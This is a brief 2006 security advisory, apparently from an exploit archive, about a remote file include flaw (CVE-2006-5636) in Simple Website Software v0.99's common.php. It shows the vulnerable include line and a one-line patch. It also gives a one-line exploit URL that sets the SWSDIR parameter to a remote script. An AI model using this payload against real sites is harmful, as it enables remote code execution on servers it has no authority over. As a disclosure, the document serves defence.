 Topic: |
Simple Website Software v0.99 (common.php) Remote File Include |
| Credit: |
Cyber-Security |
| Date: |
2006.11.01 |
| CWE: |
N/A |
| CVE: |
CVE-2006-5636 (Show details)
Use CVE to see details like:
- CVSS2,
- Affected Software,
- References |
| Risk |
Local |
| Remote |
| High |
No |
| Yes |
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-
Script: Simple Website Software v0.99 (common.php) Remote File Include
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-
Found: Cyber-Security
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-
Version: 3.0
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-
Code: include_once "$SWSDIR/local_config.php";
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-
F.X:
1- open common.php
2- add this code before wrong code
$SWSDIR = getcwd() . '/..';
3- save common.php
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-
Exploit: common.php?SWSDIR=evilscripts?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-
Thanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-
Script Download: http://prdownloads.sourceforge.net/phpsws/phpsws-0.99.tgz?download
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-
# milw0rm.com [2006-10-29]
adv: http://www.milw0rm.com/exploits/2673
[ ASCII VERSION ]
|
